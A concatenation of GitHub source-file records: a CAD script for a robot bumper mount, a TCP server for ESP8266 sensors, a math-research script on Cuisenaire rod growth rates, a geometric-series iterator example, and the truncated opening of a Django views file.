BUMBER_STICK_SEPARATION - MOUNT_STIC_SIZE, 0, -EPS ) )\n supalib.relocate( mount_2, place=( -BUMBER_STICK_SEPARATION, 0, -EPS ) )\n mount = supalib.create_union( ( mount_1, mount_2, base ) )\n mount.Label = label\n return mount\n\nSTICK_PLACE_A=(BUMBER_STICK_SEPARATION - MOUNT_STIC_SIZE + (MOUNT_STIC_SIZE - BUMBER_STICK_XSIZE)*0.5 - TOLE*0.0 , MOUNT_B_OFFSET + 10.0, MOUNT_THICKNESS )\nSTICK_PLACE_B=(-BUMBER_STICK_SEPARATION + (MOUNT_STIC_SIZE - BUMBER_STICK_XSIZE)*0.5 + TOLE*0.0, MOUNT_B_OFFSET + 10.0, MOUNT_THICKNESS )\ndef create_stick():\n thick = (MOUNT_STIC_SIZE - BUMBER_STICK_XSIZE)*0.5\n bsize = BUMBER_STICK_XSIZE - 2 *TOLE\n b1 = supalib.create_box( size=( bsize, BUMBER_STICK_LEN, bsize), place =STICK_PLACE_A )\n b2 = supalib.create_box( size=( bsize, BUMBER_STICK_LEN, bsize), place =STICK_PLACE_B )\n b3 = supalib.create_box( size=( 2*BUMBER_STICK_SEPARATION - 2*EPS - MOUNT_STIC_SIZE + bsize*0.25, bsize, bsize), place=( bsize*0.25 + -BUMBER_STICK_SEPARATION + thick + EPS, -BUMBER_STICK_XSIZE - TOLE, MOUNT_THICKNESS ) )\n b1 = supalib.create_fillet( b1 )\n b2 = supalib.create_fillet( b2 )\n part = supalib.create_union( ( b1,b2,b3) )\n part.Label = \"Stick\"\n return part\n\ndef create_bumber():\n BUMBER_SIZE_MINUS = 60 + BUMBER_STICK_SEPARATION\n BUMBER_SIZE_PLUS = 30 + BUMBER_STICK_SEPARATION\n BUMBER_MOUNT_SIZE = BUMBER_STICK_XSIZE + 2*MOUNT_THICKNESS + TOLE\n def create_bmount():\n raw = supalib.create_box( size=( BUMBER_MOUNT_SIZE, MOUNT_THICKNESS, BUMBER_MOUNT_SIZE) )\n hole = supalib.create_box( size=( BUMBER_STICK_XSIZE + 2*TOLE, MOUNT_THICKNESS*0.5, BUMBER_STICK_XSIZE + 2*TOLE ), place=(MOUNT_THICKNESS - TOLE, 0.0, MOUNT_THICKNESS - TOLE) )\n return supalib.create_cut( raw, hole )\n\n m1 = create_bmount()\n m2 = create_bmount()\n \n s0 = supalib.create_box( size=( BUMBER_SIZE_MINUS + BUMBER_SIZE_PLUS, MOUNT_THICKNESS, MOUNT_THICKNESS ), place=(-BUMBER_SIZE_MINUS,0,2*BUMBER_MOUNT_SIZE + MOUNT_THICKNESS) )\n s1 = supalib.create_box( size=( BUMBER_SIZE_MINUS + BUMBER_SIZE_PLUS, MOUNT_THICKNESS, MOUNT_THICKNESS ), place=(-BUMBER_SIZE_MINUS,0,BUMBER_MOUNT_SIZE - EPS ) )\n s2 = supalib.create_box( size=( BUMBER_SIZE_MINUS + BUMBER_SIZE_PLUS, MOUNT_THICKNESS, MOUNT_THICKNESS ), place=(-BUMBER_SIZE_MINUS,0,-MOUNT_THICKNESS - EPS) )\n s3 = supalib.create_box( size=( BUMBER_SIZE_MINUS + BUMBER_SIZE_PLUS, MOUNT_THICKNESS, MOUNT_THICKNESS ), place=(-BUMBER_SIZE_MINUS,0,-2*MOUNT_THICKNESS - BUMBER_MOUNT_SIZE) )\n \n hsize = ( MOUNT_THICKNESS, MOUNT_THICKNESS, 3*(MOUNT_THICKNESS + BUMBER_MOUNT_SIZE) + MOUNT_THICKNESS + EPS )\n d1 = supalib.create_box( size=hsize, place=(-BUMBER_SIZE_MINUS,0,-2*MOUNT_THICKNESS - BUMBER_MOUNT_SIZE) )\n d2 = supalib.create_box( size=hsize, place=( BUMBER_SIZE_PLUS - MOUNT_THICKNESS ,0,-2*MOUNT_THICKNESS - BUMBER_MOUNT_SIZE) )\n \n d3 = supalib.create_box( size=hsize, place=( -BUMBER_STICK_SEPARATION - MOUNT_THICKNESS ,0,-2*MOUNT_THICKNESS - BUMBER_MOUNT_SIZE) )\n d4 = supalib.create_box( size=hsize, place=( -BUMBER_STICK_SEPARATION + BUMBER_MOUNT_SIZE ,0,-2*MOUNT_THICKNESS - BUMBER_MOUNT_SIZE) )\n d5 = supalib.create_box( size=hsize, place=( BUMBER_STICK_SEPARATION ,0,-2*MOUNT_THICKNESS - BUMBER_MOUNT_SIZE) )\n d6 = supalib.create_box( size=hsize, place=( BUMBER_STICK_SEPARATION - BUMBER_MOUNT_SIZE - MOUNT_THICKNESS ,0,-2*MOUNT_THICKNESS - BUMBER_MOUNT_SIZE) )\n \n \n d7 = supalib.create_box( size=hsize, place=( 0.5*( -BUMBER_STICK_SEPARATION - MOUNT_THICKNESS - BUMBER_SIZE_MINUS) ,0,-2*MOUNT_THICKNESS - BUMBER_MOUNT_SIZE) )\n \n #d5 = supalib.create_box( size=hsize, place=( 2*BUMBER_STICK_SEPARATION ,0,-2*MOUNT_THICKNESS - BUMBER_MOUNT_SIZE) )\n #d6 = supalib.create_box( size=hsize, place=( 2*BUMBER_STICK_SEPARATION -BUMBER_MOUNT_SIZE -MOUNT_THICKNESS ,0,-2*MOUNT_THICKNESS - BUMBER_MOUNT_SIZE) )\n\n sup = supalib.create_union( (s0, s1,s2,s3,d1,d2,d3, d4, d5, d6, d7 ) )\n # ,d5,d6\n supalib.relocate( m1, place=(STICK_PLACE_A[0] - MOUNT_THICKNESS, STICK_PLACE_A[1] + BUMBER_STICK_LEN, 0 ) )\n supalib.relocate( m2, place=(STICK_PLACE_B[0] - MOUNT_THICKNESS, STICK_PLACE_A[1] + BUMBER_STICK_LEN, 0 ) )\n supalib.relocate( sup, place=(0.0, STICK_PLACE_A[1] + BUMBER_STICK_LEN, 0 ) )\n bumber = supalib.create_union( (sup, m1, m2 ) )\n bumber.Label=\"Bumber\"\n return bumber\n \n \nbumber = create_bumber() \nmount_a = create_full_part ( False, \"Mount_front\" )\nmount_b = create_full_part ( True, \"Mount_rear\" )\nsupalib.relocate( mount_b, place=( 0.0, MOUNT_B_OFFSET , 0.0) )\n\nstick = create_stick()\n\n\nfor x in [ bumber, mount_a, mount_b, stick ]:\n supalib.creta_mesh_from( x )\n\nsupalib.finish()\n\n\n\n\n","repo_name":"susundberg/zephyr-robot-supa2019","sub_path":"3d_parts/robot_bumber_mount_a.py","file_name":"robot_bumber_mount_a.py","file_ext":"py","file_size_in_byte":6198,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"}
+{"seq_id":"17111691253","text":"#!/usr/bin/env python3\n# *_* coding: utf-8 *_*\n\n\"\"\"TCP Server library\"\"\"\n\nimport socket\nimport select\nimport time\nimport getmac\n\nclass new_connection(Exception):\n \"\"\"TCP: New connection detected\"\"\"\n pass\n\nclass address_does_not_exist(Exception):\n \"\"\"TCP: Address does exist in dictionary\"\"\"\n def __init__(self, *args):\n super().__init__(*args)\n\ndef get_ip():\n \"\"\"Find local IP of the current network interface, avoid 127.0.0.1\"\"\"\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n try:\n # doesn't even have to be reachable\n s.connect(('10.255.255.255', 1))\n IP = s.getsockname()[0]\n except:\n IP = '127.0.0.1'\n finally:\n s.close()\n return IP\n\n\ndef receive_message(client_socket):\n \"\"\"Recive message from client_socket\"\"\"\n try:\n mess = client_socket.recv(1024)\n if (not len(mess)):\n return False\n elif (len(mess) <= 2) or (mess == '\\r\\n'):\n return\n return mess\n \n except:\n return False\n\nclass tcp_server:\n \"\"\"Create a TCP/IP Server\"\"\"\n def __init__(self,IP,PORT):\n self.IP = IP\n self.PORT = PORT\n self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.server_socket.setblocking(0)\n self.server_socket.bind((self.IP, self.PORT))\n self.server_socket.listen(5)\n self.sockets_list = [self.server_socket]\n self.socket_list_by_mac = {}\n self.id_dict = {}\n self.msg = {}\n self.read_sockets = []\n self.write_sockets = []\n self.exception_sockets = []\n self.mac_list = []\n \n\n def update_sockets_list(self):\n \"\"\"Update sockets list to read_sockets, write_sockets, exception_sockets\"\"\"\n self.read_sockets, self.write_sockets, self.exception_sockets = select.select(self.sockets_list, self.sockets_list, [], 0)\n\n def check_read_sockets(self):\n \"\"\"Handle new connection after updating socket lists\"\"\" \n for notified_socket in self.read_sockets:\n if notified_socket == self.server_socket:\n raise new_connection('New Connection')\n\n def new_socket_handler(self):\n \"\"\"New socket handler\"\"\"\n client_socket, client_address = self.server_socket.accept()\n client_mac = getmac.get_mac_address(ip = client_address[0], network_request=True)\n client_socket.setblocking(0)\n self.sockets_list.append(client_socket)\n logic = True\n for mac in self.mac_list:\n if mac == client_mac:\n client_socket.send(b\"Welcome back!\")\n logic = False\n try:\n self.sockets_list.remove(self.socket_list_by_mac[mac])\n except ValueError:\n pass\n self.socket_list_by_mac[mac]=client_socket\n return\n\n if logic:\n raise address_does_not_exist(client_socket, client_address)\n\n def create_new_socket(self, client_socket, client_address, id):\n \"\"\"Create new TCP socket\"\"\"\n client_mac = getmac.get_mac_address(ip = client_address[0], network_request=True)\n self.id_dict[client_mac] = id\n self.mac_list.append(client_mac)\n self.socket_list_by_mac[client_mac] = client_socket\n \n def send_all(self, mess):\n \"\"\"THIS FUNCTION IS WRONG\"\"\"\n for key in self.id_dict:\n if (self.id_dict[key] != 'UPS') and (self.id_dict[key] != 'AC') and (key != self.server_socket):\n key.send(mess.encode('utf-8'))\n\n def therm_parsing(self, mess):\n \"\"\"Split a message from a client into 2 variables by spaces\"\"\"\n mess_list = mess.split()\n if len(mess_list) == 2:\n return mess_list[0], mess_list[1]\n\n def recv_all(self):\n \"\"\"Receive all messages from clients and parse as therm\"\"\"\n self.update_sockets_list()\n return_list = []\n for notified_socket in self.read_sockets:\n if notified_socket != self.server_socket:\n client_mac = getmac.get_mac_address(ip = notified_socket.getpeername()[0])\n if self.id_dict[client_mac] != 'UPS':\n mess_dict = {'ID':self.id_dict[client_mac]}\n message = receive_message(notified_socket)\n if message is False:\n self.sockets_list.remove(notified_socket)\n continue\n elif message == None:\n continue\n message = message.strip()\n try:\n temp, humid = self.therm_parsing(message)\n mess_dict['Temp'] = temp.decode('utf-8')\n mess_dict['Humid'] = humid.decode('utf-8')\n return_list.append(mess_dict)\n except TypeError:\n return_list = []\n\n return return_list","repo_name":"nguyenmthien/VGUServer_archive","sub_path":"ESP8266/PowerEfficient/socket_server.py","file_name":"socket_server.py","file_ext":"py","file_size_in_byte":4951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"23544944552","text":"\"\"\"\ncode to explore families of finite rod sets\n\nUsage: uncomment fragments after the line\n### code to execute here\n\nlast modified: 12/31/2021\n\n@author: Ethan Bolker\n\nto do: \n\nRefactor to get remove translations to and from bitstrings. \nRod sets are now specified by lists of rod lengths.\n\nImprove plotroots so that it plots all the circles corresponding to \nthe roots of the minimal polynomial, not just the one for the growth \nrate.\n- problem same as below\n\nAdd to rodsetattributes\n data.shiftpoly({\"shiftpoly\":spolystr})\ncontaining the shift polynomial - that's the\nquotient of the cpoly and the minimal poly.\n- problem: the code in rodsetattributes knows only the\n growth rate, not the factor of the cpoly that's the\n minimal polynomial. If we can't easily figure this\n out here, we might have to do it in findfamilies, when we \n know the minimal polynomial because it's (usually) the\n first one encountered.\n\"\"\"\nimport sys\nimport math\nfrom utilities import *\nfrom multi import multi\nfrom convolve import p2t\nfrom sympy import roots as sroots\nfrom sympy import solve as solve\nfrom sympy import factor as factor\nfrom numpy import *\nimport numpy as np\nimport numpy.polynomial.polynomial as poly\nimport matplotlib.pyplot as plt\n\nfrom itertools import combinations\n\ndef mygcd(mylist):\n if len(mylist) == 1:\n return mylist[0]\n else:\n return math.gcd( mylist[0],mygcd(mylist[1:]))\n\n# zzzzzzzzz\ndef build_recursion_polynomial(spots):\n ''' from input spots = [1,2,2,2,4] build recursion polynomial\n x**3 - 3*x**2 - x**1 - 1\n ''' \n coeffs = build_cuisenaire_poly_coefficients(spots)\n polystr = str(coeffs[0])\n for i in range(1,len(coeffs)-1):\n if coeffs[i] != 0:\n c = coeffs[i]\n if c > 0:\n sign = str('+')\n else:\n sign = str('-') \n polystr += sign + str(abs(c)) + '*x**' + str(i)\n polystr += '+ x**' + str(len(coeffs)-1)\n return polystr\n\n# deprecated\ndef xxxbuild_recursion_polynomial_coeffs(bits):\n ''' from input bit string 1011 build recursion polynomial\n coefficients as list [-1, -1, 0, -1, 1].\n Coefficients from constant term to degree 4.\n '''\n n = len(bits)\n coeffs = [1]\n for j in range(n)[:-1]:\n b = int(bits[j])\n coeffs.append(-b)\n coeffs.append(-1) \n coeffs.reverse()\n return coeffs\n\n# This function is no longer called. The growth rate is\n# the largest root of the Cuisenaire polynomial.\ndef xgrowthrate(d):\n ''' Calculate the growth rate for total solutions\n for the puzzle problem R(d). Here d is the \n bit string specifying which C_k are allowed, \n or that bit string as a plug number, \n or a list [a,b,...] of positions of 1 bits.\n The algorithm pads with lots of 0s to stabilize growth.\n Adjusts when gcd of plug lengths > 1.\n '''\n if isinstance(d, str): # d is a bitstring like \"101\"\n xd = bitstring2bits(d)\n elif isinstance(d, int): # convert integer d to binary\n xd = [int(i) for i in bin(d)[2:]]\n elif isinstance(d, list):\n xd = spots2bits(d)\n else:\n print(f\"type error {d}\")\n return\n spots = bits2spots(xd)\n gcd = mygcd(spots)\n spotsum = sum(spots)\n expand = 300\n lookat = expand*gcd\n zeros = 2*lookat\n goodspot = spotsum + lookat - 1\n xd.extend([0]*zeros)\n totals = p2t(xd)\n rate = (totals[goodspot + gcd]/totals[goodspot])**(1/gcd)\n return(rate)\n\ndef growthrate(rods):\n coeffs = build_cuisenaire_poly_coefficients(rods)\n r1 = poly.polyroots(coeffs)\n# maxroot = np.round(np.abs(max(r1)),10)\n maxroot = np.abs(max(r1))\n return maxroot\n \ndef rodsetattributes(input):\n ''' Create dictionary of attributes the input rod set.\n Rod set should really be an object.\n '''\n# if isinstance(input, str): # d is a bitstring like \"101\"\n# bits = input\n# elif isinstance(input, list):\n# bits = spots2bitstring(input)\n# else:\n# print(f\"type error {input}\")\n# return\n data = {}\n mypoly = build_recursion_polynomial(input)\n fpoly = factor(mypoly)\n coeffs = build_cuisenaire_poly_coefficients(input) \n# print(\"xxx mypoly\", mypoly)\n# print(\"xxx fpoly\", fpoly)\n# print(\"xxx\", coeffs)\n r1 = poly.polyroots(coeffs)\n maxroot = np.round(max(np.abs(r1)),10)\n theroots = list(np.round(np.abs(r1),3))\n rootlengths = list(set(theroots)) \n fpolystr = str(fpoly)\n fpolystr = fpolystr.replace(\"**\",\"^\").replace(\"*\",\"\").replace(\"^1 \",\"\").replace(\"1x\",\"x\") \n mypolystr = str(mypoly)\n mypolystr = mypolystr.replace(\"**\",\"^\").replace(\"*\",\"\").replace(\"^1 \",\"\").replace(\"1x\",\"x\").replace(\"^1-\",\"-\")\n# data.update({\"bits\":bits})\n data.update({\"spots\":input})\n data.update({\"growthrate\":maxroot})\n data.update({\"cpoly\":mypolystr})\n data.update({\"factors\":fpolystr})\n# data.update({\"roots\":theroots})\n data.update({\"rootlengths\":rootlengths}) \n return data\n\n# should rewrite this function to call rodsetattributes(input)\ndef csvout(input):\n ''' Print string with data about the input (bit string or rod set)\n suitable for spreadsheet input. \n Use '@' rather than a comma as the delimiter.\n '''\n if isinstance(input, str): # d is a bitstring like \"101\"\n bits = input\n elif isinstance(input, list):\n bits = spots2bitstring(input)\n else:\n print(f\"type error {input}\")\n return\n mypoly = build_recursion_polynomial(input)\n fpoly = factor(mypoly)\n coeffs = build_cuisenaire_poly_coefficients(input)\n r1 = poly.polyroots(coeffs)\n maxroot = np.round(np.abs(max(r1)),10)\n theroots = list(np.round(np.abs(r1),3))\n print(f\"{bits}@ {input}@ {maxroot}@ {mypoly}@ {fpoly} @ {theroots}\")\n return\n\ncsvheader=\"d@ spots@ growth rate@ poly@ factored@ |roots|\" \n\ndef growthratecsv(N):\n ''' Print spreadsheet input for odd plug numbers up to 2**N\n and for those numbers with prefixes 0, 00, 000 and 0000\n '''\n print(csvheader)\n for d in range(1, 1+2**N,2):\n todo = [bin(d)[2:], bin(2*d)[2:][::-1], bin(4*d)[2:][::-1],\n bin(8*d)[2:][::-1], bin(16*d)[2:][::-1] \n ]\n for bits in todo:\n csvout(bits)\n return\n\n# from //www.geeksforgeeks.org/itertools-combinations-module-python-print-possible-combinations/\ndef rSubset(arr, r):\n # return list of all subsets of length r\n # to deal with duplicate subsets use \n # set(list(combinations(arr, r)))\n return list(combinations(arr, r))\n\n# This should be refactored to call rodcount(limit, count)\ndef rodcountcsv( limit, count):\n ''' Print spreadsheet input for all cuisenaire rod sets of \n length up to limit using at most count rods\n '''\n# print(f\"count {count} limit {limit}\")\n print(csvheader)\n possibles = list(range(limit+1)[1:])\n counts = list(range(count+1))[1:]\n for j in counts:\n spotsets = rSubset( possibles, j)\n for spots in spotsets:\n csvout(list(spots))\n return \n\n# yyyyyyyyyy\ndef build_cuisenaire_poly_coefficients(rods):\n# degree = rods[len(rods)-1] # last entry\n# degree = max(rods)\n degree = max(max(rods),-min(rods))\n if degree==max(rods):\n globalsign = 1\n else:\n globalsign = -1\n coeffs = [0]*(degree+1)\n for r in rods:\n# print(r, sign(r)) \n# coeffs[degree-abs(r)] += -1\n coeffs[degree-abs(r)] -= sign(r)*globalsign\n# print(r, sign(r))\n coeffs[degree] = 1\n# print(coeffs)\n return coeffs\n\ndef get_cuisenaire_poly_roots(rods):\n coeffs = build_cuisenaire_poly_coefficients(rods)\n return np.array(poly.polyroots(coeffs))\n\ndef plotroots(rods):\n # plot the roots \n data = get_cuisenaire_poly_roots(rods)\n x = data.real\n y = data.imag\n\n # plot the circle through the largest root\n r = growthrate(rods);\n theta = np.linspace(0, 2*np.pi, 100)\n x1 = r*np.cos(theta)\n x2 = r*np.sin(theta)\n\n fig, ax = plt.subplots(1)\n ax.plot(x, y, 'b*')\n plt.xlabel(str(rods))\n ax.plot(x1, x2,'r')\n ax.set_aspect(1)\n plt.xlim(-2,2)\n plt.ylim(-2,2)\n\n plt.show() \n \ndef checkAP(spots, m):\n print(f\"{spots} + {m}k\")\n max = 80\n equiv = spots + list([m])\n equiv.sort()\n long = spots.copy()\n for r in spots:\n nextr = r+m\n while nextr < max:\n long.append(nextr)\n nextr += m\n long.sort()\n print(f\"{long} {growthrate(long)}\")\n print(f\"{equiv} {growthrate(equiv)}\")\n\ndef xfindfamilies( limit, count):\n ''' Collect cuisenaire rod sets of \n length up to limit using at most count rods\n into families keyed by growthrate.\n '''\n families = {} \n# print(f\"count {count} limit {limit}\")\n possibles = list(range(limit+1)[1:])\n counts = list(range(count+1))[1:]\n for j in counts:\n spotsets = rSubset( possibles, j)\n for spots in spotsets:\n if mygcd(spots) > 1:\n break\n attributes = rodsetattributes(list(spots))\n key = attributes.get(\"growthrate\")\n if families.get(key) == None:\n families[key] = [list(attributes[\"spots\"])]\n else:\n families[key].append(list(attributes[\"spots\"]))\n return families\n\ndef findfamilies( length, count):\n ''' Collect cuisenaire rod sets of \n length up to length using at most count rods\n into families keyed by growthrate.\n '''\n families = {}\n spotsetattributes = rodcountmultisets(length, count )\n for spots in spotsetattributes:\n \n# if len(spots['bits']) == 1:\n# continue\n key = spots.get(\"growthrate\")\n# print(key)\n if families.get(key) == None:\n# families[key] = spots\n families[key] = []\n families[key].append(spots)\n return families\n\n# zzzzzzzzzz\ndef rodcountmultisets( length, limit):\n ''' Create list of attributes for all cuisenaire rod multisets of \n length up to limit using at most count rods\n '''\n rodcounts = []\n spotsets = multi(length, limit)\n for spots in spotsets:\n if len(spots) == 1:\n continue\n# if mygcd(spots) > 1:\n# continue\n attributes = rodsetattributes(list(spots))\n rodcounts.append(attributes)\n return rodcounts\n\ndef rodcount( limit, count):\n ''' Create list of attributes for all cuisenaire rod sets of \n length up to limit using at most count rods\n '''\n rodcounts = []\n possibles = list(range(limit+1)[1:])\n counts = list(range(count+1))[1:]\n for j in counts:\n spotsets = rSubset( possibles, j)\n for spots in spotsets:\n# if mygcd(spots) > 1:\n# continue\n attributes = rodsetattributes(list(spots))\n rodcounts.append(attributes)\n return rodcounts\n\n\ndef findrodsfor(target, epsilon, rods=None):\n# print(f\"target {target} epsilon {epsilon} start {rods}\")\n if rods is None:\n rods = [1] \n g = growthrate(rods)\n if g > target:\n print(\"target smaller than start\")\n return rods\n while np.abs(target-g) > epsilon:\n while g < target:\n rods.append(rods[-1])\n g = growthrate(rods) \n rods[-1] = 1+rods[-1]\n g = growthrate(rods) \n# print(f\"{rods} {g}\")\n return(rods)\n\ndef findrodsclassicfor(target, epsilon):\n# print(f\"{target} {epsilon}\")\n rods = [1]\n g = growthrate(rods)\n print(f\"{rods} {g}\") \n while np.abs(target-g) > epsilon:\n rods.append(1+rods[-1])\n g = growthrate(rods)\n# print(f\"{rods} {g}\") \n while g > target:\n rods[-1] = 1+rods[-1]\n g = growthrate(rods)\n return(rods)\n\ndef hasduplicates(listOfElems, skipstart= 0):\n ''' Check if given list contains any duplicates \n ignoring first skipstart items\n '''\n return not len(listOfElems[skipstart:]) == len(set(listOfElems[skipstart:]))\n\ndef compareg(rods, extra):\n g = growthrate(rods)\n rods.append(extra)\n gx = growthrate(rods)\n return rods, extra, gx-g\n\ndef buildtree(rods, level):\n ''' find rod sets in the tree build by expanding\n the rods in R by R\n '''\n tree = [[rods]]\n for i in range(level):\n nextlevel =[]\n for rodset in tree[i]:\n for r in rodset:\n next = rodset.copy()\n next.remove(r)\n for s in rods:\n next.append(r+s)\n next.sort()\n nextlevel.append(next)\n tree.append(nextlevel)\n return tree\n\n\ndef commonexpansion(rods1, rods2, depth):\n from itertools import chain \n t1 = buildtree(rods1, depth);\n t2 = buildtree(rods2, depth);\n f1 = list(chain(*t1))\n f2 = list(chain(*t2)) \n return [value for value in f1 if value in f2] \n\ndef cpolyisminimal(rods):\n data = rodsetattributes(rods)\n return not \"(\" in data.get(\"factors\")\n\ndef getrandomrodset(length, candidates):\n rods = length*[0]\n for i in range(length):\n rods[-i] = random.choice(candidates)\n return list(sort(rods))\n\ndef countminimalcpolys(count, length, rodrange):\n ''' find the proportion of rod sets with minimal cpoly\n in a random selection of count rod sets of given length\n with elemens chosen from rodrange.\n '''\n minimalcount = 0\n for i in range(count):\n rods = getrandomrodset(length, rodrange)\n# print(i,rods)\n if cpolyisminimal(rods):\n minimalcount += 1\n# else:\n# print(rodsetattributes(rods))\n return minimalcount/count\n \n### code to execute here\nif __name__ == \"__main__\":\n\n## default:\n## Print details about rod set from command line\n \n if len(sys.argv) > 1: \n rodset = list(map(int, sys.argv[1:]))\n print(rodsetattributes( rodset))\n plotroots(rodset)\n\n\n## Print families with at least two members\n# Separator '@' instead of ',' smooths spreadsheet import from\n# csv file that's really now @sv\n# \n# families = findfamilies(3,4)\n# for f in families.values():\n# if len(f) > 2:\n# print(f\"{f[0]['growthrate']}\")\n# for i in range(len(f)):\n# cpoly = str(f[i]['cpoly'])\n# factors = str(f[i]['factors'])\n# print(f\"@{f[i]['spots']}@{cpoly}@{factors}\")\n\n\n##\n# print(\"countminimalcpolys(count=100, length=10, rodrange=range(1,n))\")\n# for n in range(10,100,5):\n# print(n, countminimalcpolys(count=100, length=10, rodrange=range(1,n)))\n# \n # rods = [1,2]\n# print(rods, cpolyisminimal(rods))\n# rods = [1,5]\n# print(rods, cpolyisminimal(rods))\n\n## Print the intersection of the trees from two rod sets\n# print(commonexpansion([1,3,3],[1,3,4,6,6],2))\n\n\n## Print the tree of expansions of a rod set to specified depth \n# rods = [2,3] \n# tree23 = buildtree(rods,3)\n# for level in tree23:\n# print(level)\n\n## Print the growthrate for a rod set\n# print(growthrate([1,3,4]))\n\n## Print the start of infinite rod set for a given growthrate\n# to specified precision with optional beginning\n# rate = growthrate([3,4])\n# eps = 0.0000001\n# print(findrodsfor(rate, eps))\n# print(findrodsfor(rate, eps, rods=[2]))\n# print(findrodsfor(rate, eps, [3])) \n\n######################################################################\n# \n# Only special purpose code from here on\n# \n# print(f\"{growthrate([1,10,20])}\")\n# print(f\"{growthrate([1,10,10,20])}\") \n# print(compareg([1,10,20], 10)) \n\n# check to see if we ever get nonclassic rod sets\n# start = 1.1\n# step = 0.001\n# epsilon = 0.00000001\n# count = 10\n# for i in range(count):\n# rate = start + i*step\n# rods = findrodsfor(rate, epsilon)\n# print(rods)\n# if hasduplicates(rods):\n# print(rate, rods)\n\n# eps = 0.00000001\n# rate = 1.6\n# print(findrodsfor(rate, eps))\n# print(findrodsfor(rate, eps, rods=[2]))\n# print(findrodsfor(rate, eps, rods=[3]))\n# print(findrodsfor(rate, eps, rods=[4]))\n# print(findrodsfor(rate, eps, rods=[2,5])) \n \n# print(hasduplicates([1,2,3]))\n# print(hasduplicates([1,2,2])) \n# print(findrodsfor(rate, eps,[2])) \n# print(findrodsfor(rate, eps,[3]))\n# print(findrodsfor(rate, eps,[4])) \n# print(findrodsclassicfor(rate,eps))\n\n \n# rods=[1]\n# for j in range(100):\n# rods.append\n# print(f\"{growthrate(rods)}\")\n\n \n# findrodsfor(3.5, 0.00000001)\n# findrodsfor(sqrt(2), 0.00000001)\n\n# families = findfamilies(2,50)\n# for f in families.values():\n# if len(f) > 1:\n# print()\n\n# put families into latex table\n# families = findfamilies(6,10)\n# for f in families.values():\n# if len(f) > 4:\n# print()\n# print(\"\\\\documentclass{standalone}\")\n# print(\"\\\\begin{document}\")\n# print()\n# print(\"\\\\begin{tabular}{llllllllllllllllllll}\")\n# allspots = list(f[i]['spots'] for i in range(len(f)))\n# allspots.sort(key=max)\n# allspots.sort(key=len) \n# row = len(allspots[0])\n# count = 0 \n# for spots in allspots:\n# if row != len(spots):\n# print(\" \\\\\\\\\")\n# print(\" \\\\\\\\\")\n# print(\" \\\\\\\\\")\n# print(\" \\\\\\\\\") \n# row = len(spots)\n# count = 0\n# if count > 7:\n# print(\" \\\\\\\\\")\n# print(\" \\\\\\\\\") \n# print(\"\", end=\"\")\n# count = 0\n# count += 1\n# print(\"$\"+str(spots).replace(\" \",\"\"), end=\"$ & \")\n# print()\n# print(\"\\\\end{tabular}\")\n# print(\"\\\\end{document}\") \n# testing sorting\n# ll = [[1, 6, 10],[1, 7, 8],[2, 4, 8],[2, 5, 6],[3, 3, 7],[3, 4, 5]]\n# print(ll)\n# ll.sort()\n# print(ll) \n# ll.sort(key=max)\n# print(ll) \n\n# families = findfamilies(3,3)\n# for f in families.values():\n# if len(f) > 1:\n# print(f\"{f[0]['growthrate']}\")\n# for i in range(len(f)):\n# cpoly = str(f[i]['cpoly']).replace(\"**\",\"^\")\n# cpoly = cpoly.replace(\"*\",\"\")\n# cpoly = cpoly.replace(\"^1\",\"\") \n# factors = str(f[i]['factors']).replace(\"**\",\"^\")\n# factors = factors.replace(\"*\",\"\")\n# factors = factors.replace(\"^1\",\"\") \n# print(f\"@{f[i]['spots']}@{cpoly}@{factors}\")\n\n\n# print\n\n# csvout([1,3])\n# csvout([3,5,5,5,6,7,7])\n# csvout([1,2,2,2,4])\n# print(rodsetattributes([1,2,2,2,4]))\n# csvout([1,3,4])\n# print(rodsetattributes([1,3,4]))\n \n# find all rod sets of length 2, extract growthrate and rods for excel\n# data = rodcount(40,2)\n# for spots in data:\n# if len(spots[\"spots\"]) == 2:\n# print(f\"{spots['spots']}@{spots['spots'][0]}@{spots['spots'][1]}@ {spots['growthrate']} \")\n \n","repo_name":"ktllee/plug_problem","sub_path":"cuisenaire/Ethan/cuisenaire.py","file_name":"cuisenaire.py","file_ext":"py","file_size_in_byte":19524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"18323926243","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @File : 等比数列.py\n# @Author: Lizi\n# @Date : 2020/12/23\n\n\nclass Geometric_series_based_iterator:\n def __init__(self, first=0, step=1, sequence_count=10):\n self._first = first\n self._step = step\n self._sequence_counter = sequence_count\n self._index = 0\n\n def __iter__(self):\n return self\n\n def __next__(self):\n if self._index < self._sequence_counter:\n res = self._first * (self._step ** self._index)\n self._index += 1\n return res\n else:\n raise StopIteration\n\n\ndef geometric_series_based_generator(first=0, step=1, sequence_count=10):\n \"\"\"基生生成器函数的等差数列,与上面的代码功能完全相同\"\"\"\n for index in range(0, sequence_count):\n res = first * step ** index\n yield res\n index += 1\n\n\nif __name__ == '__main__':\n interator = Geometric_series_based_iterator(first=1, step=2, sequence_count=10)\n print(\"基于迭代器的等比数列的结果:\")\n for num in interator:\n print(num, end=' ')\n\n print(' ')\n\n generator = geometric_series_based_generator(first=1, step=2, sequence_count=10)\n print(\"基于生成器的等比数列的结果:\")\n for num in generator:\n print(num, end=' ')\n","repo_name":"rage-vampire/Python","sub_path":"lizi_project/built_in_function/iter+generaotr/等比数列.py","file_name":"等比数列.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"74453147369","text":"import calendar\nimport csv\n\nfrom collections import defaultdict\nfrom datetime import timedelta, datetime\nfrom dateutil import tz\nfrom urllib.parse import urlencode\n\nfrom django.conf import settings\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom django.core import signing\nfrom django.db import IntegrityError\nfrom django.http import JsonResponse, HttpResponse\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.utils.html import strip_tags\nfrom django.utils.http import http_date\nfrom django.utils.timezone import now\nfrom django.urls import reverse\nfrom django.views.decorators.cache import never_cache, cache_page\nfrom django.utils.decorators import method_decorator\nfrom django.views.decorators.csrf import csrf_protect\n\nfrom django import 